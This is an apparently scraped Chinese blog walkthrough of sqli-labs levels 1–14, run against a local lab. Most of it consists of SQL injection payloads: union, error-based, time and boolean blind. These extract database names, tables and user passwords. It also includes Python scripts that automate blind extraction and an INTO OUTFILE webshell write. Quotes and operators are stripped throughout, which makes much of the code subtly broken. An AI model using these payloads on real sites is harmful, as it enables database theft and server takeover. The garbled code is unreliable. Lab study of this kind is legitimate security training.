做网站的公司如何推广,wordpress 文章底部,广州企业网站建设电话,四川整站优化关键词排名目录
第一关#xff08;字符型注入#xff09;
第二关#xff08;数字型注入#xff09;
第三关#xff08;闭合方式不同#xff09;
第四关#xff08;用双引号闭合#xff09;
第五关#xff08;不会数据回显#xff09;
第六关#xff08;闭合方式不同双引…目录
第一关字符型注入
第二关数字型注入
第三关闭合方式不同
第四关用双引号闭合
第五关不会数据回显
第六关闭合方式不同双引号 ”
第7关outfile注入
第八关布尔盲注
第九关时间盲注
第十关闭合方式不同
第十一关post注入
第十二关闭合方式不同双引号
第十三关报错注入
第十四关双引号 第一关字符型注入
判断注入是否存在
http://127.0.0.1/sqllabs/Less-1/?id1 判断sql语句是否拼接
http://127.0.0.1/sqllabs/Less-1/?id1http://127.0.0.1/sqllabs/Less-1/?id1-- 可以根据结果指定是字符型且存在sql注入漏洞。因为该页面存在回显所以我们可以使用联合查询。
联合注入
爆列
首先知道表格有几列如果报错就是超出列数显示正常则是没有超出列数使用二分法先查看一个大的数值显示正常则翻倍报错则缩小一半数值
http://127.0.0.1/sqllabs/Less-1/?id1 order by 5--
http://127.0.0.1/sqllabs/Less-1/?id1 order by 3--
http://127.0.0.1/sqllabs/Less-1/?id1 order by 4-- 爆显示位
由于我们已经知道了这个表有三列所以我们使用联合查询来爆出显示位
http://127.0.0.1/sqllabs/Less-1/?id1 union select 1,2,3--
http://127.0.0.1/sqllabs/Less-1/?id-1 union select 1,2,3-- 由于只能查看一组数据所以我们需要修改id值让他要么远超这个数据表要么小于0 爆数据库名和版本号
我们知道了回显的列数是第二列和第三列所以我们可以直接爆出数据库名和版本号
http://127.0.0.1/sqllabs/Less-1/?id-1 union select 1,database(),version()--
爆表
http://127.0.0.1/sqllabs/Less-1/?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema security--
information_schema.tables表示该数据库下的tables表group_concat() 是将查询结果连接起来显示出一行数据如果不用group_concat查询到的结果只有user。 爆字段名
我们通过sql语句查询后的结果知道当前数据库有四个表根据表名猜测账户和密码可能在users表中
http://127.0.0.1/sqllabs/Less-1/?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers--
该语句的意思是查询information_schema数据库下的columns表里面且table_users字段内容是users的所有column_name内。 由查询到的结果猜测username和password是账户名和密码
获取用户名和密码
http://127.0.0.1/sqllabs/Less-1/?id-1 union select 1,2,group_concat(username ,0x3a , password) from users-- 第二关数字型注入
判断是否有注入问题
输入单引号根据报错信息确定咱们输入的内容被原封不动的带入到数据库中也可叫做数字型注入,就是把第一题中id1后面的单引号去掉
http://127.0.0.1/sqllabs/Less-2/?id1
http://127.0.0.1/sqllabs/Less-2/?id1--
http://127.0.0.1/sqllabs/Less-2/?id1
http://127.0.0.1/sqllabs/Less-2/?id1-- 联合注入
爆列和第一关一样的思想
http://127.0.0.1/sqllabs/Less-3/?id1 order by 5--
http://127.0.0.1/sqllabs/Less-3/?id1 order by 3--
http://127.0.0.1/sqllabs/Less-3/?id1 order by 4--
爆数据库名和版本号
http://127.0.0.1/sqllabs/Less-2/?id-1 union select 1,database(),version()--
爆表
http://127.0.0.1/sqllabs/Less-2/?id-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema security--
爆字段名
http://127.0.0.1/sqllabs/Less-2/?id-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers--
获取用户名和密码
http://127.0.0.1/sqllabs/Less-2/?id-1 union select 1,2,group_concat(username ,0x3a , password) from users--第三关闭合方式不同
http://127.0.0.1/sqllabs/Less-3/?id1
http://127.0.0.1/sqllabs/Less-3/?id1--
http://127.0.0.1/sqllabs/Less-3/?id1)
http://127.0.0.1/sqllabs/Less-3/?id1)--
输入单引号根据报错信息确定咱们输入的内容存放到一对单引号加圆括号中了猜想一下咱们输入1在数据库语句中的位置形如select … from … where id( ‘1’) …在第一题中id1’的后面单引号加上其它保持不变就行了。
联合注入
http://127.0.0.1/sqllabs/Less-3/?id1
http://127.0.0.1/sqllabs/Less-3/?id1--
http://127.0.0.1/sqllabs/Less-3/?id1)
http://127.0.0.1/sqllabs/Less-3/?id1)--
闭合方式改成
包数据库和version
http://127.0.0.1/sqllabs/Less-3/?id-1) union select 1,database(),version()--
爆表
http://127.0.0.1/sqllabs/Less-3/?id-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema security-- 爆字段
http://127.0.0.1/sqllabs/Less-3/?id-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_nameusers--
获取用户名和密码
http://127.0.0.1/sqllabs/Less-3/?id-1) union select 1,2,group_concat(username ,0x3a , password) from users--
第四关用双引号闭合
然后跟前几关一样
http://127.0.0.1/sqllabs/Less-3/?id-1) union select 1,2,group_concat(username ,0x3a , password) from users--
第五关不会数据回显
不显示只有对错页面显示我们可以选择布尔盲注报错注入。布尔盲注主要用length(),ascii() ,substr()这三个函数但是我这一关不打算用布尔盲注。报错注入主要使用updatexml、extractvalue、floor三个函数。
http://127.0.0.1/sqllabs/Less-5/?id1
http://127.0.0.1/sqllabs/Less-5/?id1-- 这一关我使用updatetexml注入
爆数据库名和版本号
http://127.0.0.1/sqllabs/Less-5/?id1 and updatexml(1,concat(~,(select database()),~),1)--
http://127.0.0.1/sqllabs/Less-5/?id1 and updatexml(1,concat(~,(select version()),~),1)-- 爆表
http://127.0.0.1/sqllabs/Less-5/?id1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1)-- 爆字段名
http://127.0.0.1/sqllabs/Less-5/?id1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1)-- 获取用户名和密码
updatetexml 一次性只能显示32个数据所以我们需要截取
http://127.0.0.1/sqllabs/Less-5/?id1 and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)--
http://127.0.0.1/sqllabs/Less-5/?id1 and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),1)--
extractvalue注入
http://127.0.0.1/sqllabs/Less-5/?id1 and extractvalue(1,concat(0x7e,(select database()),0x7e))--
http://127.0.0.1/sqllabs/Less-5/?id1 and extractvalue(1,concat(0x7e,(select version()),0x7e))--
http://127.0.0.1/sqllabs/Less-5/?id1 and extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e))--
http://127.0.0.1/sqllabs/Less-5/?id1 and extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e))--
http://127.0.0.1/sqllabs/Less-5/?id1 and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e))--
http://127.0.0.1/sqllabs/Less-5/?id1 and extractvalue(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e))--
floor注入
http://127.0.0.1/sqllabs/Less-5/?id1 and (select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://127.0.0.1/sqllabs/Less-5/?id1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://127.0.0.1/sqllabs/Less-5/?id1 and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://127.0.0.1/sqllabs/Less-5/?id1 and (select 1 from (select count(*),concat(concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://127.0.0.1/sqllabs/Less-5/?id1 and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--
http://127.0.0.1/sqllabs/Less-5/?id1 and (select 1 from (select count(*),concat(concat(0x7e,(select concat(username,0x3a,password)from users limit 1,1),0x7e),floor(rand(0)*2))x from information_schema.tables group by x)a)--
第六关闭合方式不同双引号 ”
第7关outfile注入
需要知道对方文件在哪 才可以利用 比较鸡肋
通常面试会这样问
mysql 怎么上传一个shell 导出一个shell 1、必须有权限 2、secure_file-priv 必须为空值不是null 3、对方网站的文件物理地址 http://127.0.0.1/sqllabs/less-7/?id-1%27))%20union%20select%201,user(),%27%3C?php%20phpinfo();?%3E%27%20into%20outfile%20%22F:\\phpstudy_pro\\WWW\\sqllabs\\webshell.php%22-- 第八关布尔盲注
你会发现输入什么都不会显示报错只会有一个you are in…… 所以我们得想到什么形式会显示一真一假 布尔类型
写python爬虫让他自己去爆
爆数据库名
import requests#第8关
def inject_database(url):name for i in range(1, 20):min_value 32max_value 128mid (min_value max_value) // 2while min_value max_value:payload ?id1 and ascii(substr(database(),%d,1)) %d-- % (i, mid)r requests.get(url payload)if You are in........... in r.text:min_value mid 1else:max_value midmid (min_value max_value) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-8/inject_database(url)
结果
爆表
import requests#第8关
def inject_database(url):name for i in range(1, 32):min_value 32max_value 128mid (min_value max_value) // 2while min_value max_value:payload ?id1 and ascii(substr(concat((select group_concat(table_name)from information_schema.tables where table_schemasecurity)),%d,1)) %d-- % (i, mid)r requests.get(url payload)if You are in........... in r.text:min_value mid 1else:max_value midmid (min_value max_value) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-8/inject_database(url)
结果
爆字段名
import requests#第8关
def inject_database(url):name for i in range(1, 32):min_value 32max_value 128mid (min_value max_value) // 2while min_value max_value:payload ?id1 and ascii(substr(concat((select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers)),%d,1)) %d-- % (i, mid)r requests.get(url payload)if You are in........... in r.text:min_value mid 1else:max_value midmid (min_value max_value) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-8/inject_database(url) 获取用户名和密码
import requests#第8关
def inject_database(url):name for i in range(1, 1000):min_value 32max_value 128mid (min_value max_value) // 2while min_value max_value:payload ?id1 and ascii(substr(concat((select group_concat(username ,0x3a , password) from users)),%d,1)) %d-- % (i, mid)r requests.get(url payload)if You are in........... in r.text:min_value mid 1else:max_value midmid (min_value max_value) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-8/inject_database(url)
第九关时间盲注
这一关输入的sql语句无论对错都只会显示You are in...........因此我们判断这一关需要时间盲注来进行闯关。让浏览器沉睡
继续写python爬虫
前边都跟第八关差不多 我只写了最终结果
import requests
import timedef inject_database(url):name for i in range(1, 20):low 32high 128mid (low high) // 2while low high:payload ?id1 and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) %d, sleep(3), 0)-- % (i, mid)start_time time.time()r requests.get(url payload)end_time time.time()if end_time - start_time 1:low mid 1else:high midmid (low high) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-9/inject_database(url)
第十关闭合方式不同
双引号闭合 def inject_database(url):name for i in range(1, 20):low 32high 128mid (low high) // 2while low high:payload ?id1 and if(ascii(substr((select group_concat(username, 0x3a, password) from users), %d, 1)) %d, sleep(1), 0)-- % (i, mid)start_time time.time()r requests.get(url payload)end_time time.time()if end_time - start_time 1:low mid 1else:high midmid (low high) // 2if mid 32:breakname chr(mid)print(name)return nameif __name__ __main__:url http://127.0.0.1/sqllabs/Less-10/inject_database(url)
————————————————版权声明本文为博主原创文章遵循 CC 4.0 BY-SA 版权协议转载请附上原文出处链接和本声明。原文链接https://blog.csdn.net/huizhaohaha/article/details/138783298
第十一关post注入
查看页面 我们发现username 是注入点
百变不离其尊跟get传参差不多
我们发现联合查询注入是可行的接下来就是该爆数据库、表、字段和用户账号密码
aaa union select 1,database()#
aaa union select 1,group_concat(table_name) from information_schema.tables where table_schema security#
aaa union select 1,group_concat(column_name) from information_schema.columns where table_nameusers#
aaa union select 1,group_concat(username ,0x3a , password) from users# 第十二关闭合方式不同双引号
aaa) union select 1,database()#
aaa) union select 1,group_concat(table_name) from information_schema.tables where table_schema security#
aaa) union select 1,group_concat(column_name) from information_schema.columns where table_nameusers#
aaa) union select 1,group_concat(username ,0x3a , password) from users# 第十三关报错注入
aaa) and updatexml(1,user(),1)#
aaa) and updatexml(1,concat(~,(select database()),~),1)#
aaa) and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1)#
aaa) and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1)#
aaa) and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#
由于只能显示一个字段所以我们使用limit进行逐个输出
第十四关双引号
闭合方式不同
aaa and updatexml(1,user(),1)#
aaa and updatexml(1,concat(~,(select database()),~),1)#
aaa and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schemasecurity),0x7e),1)#
aaa and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema security and table_nameusers),0x7e),1)#
aaa and updatexml(1,concat(0x7e,(select concat(username,0x3a,password)from users limit 0,1),0x7e),1)#
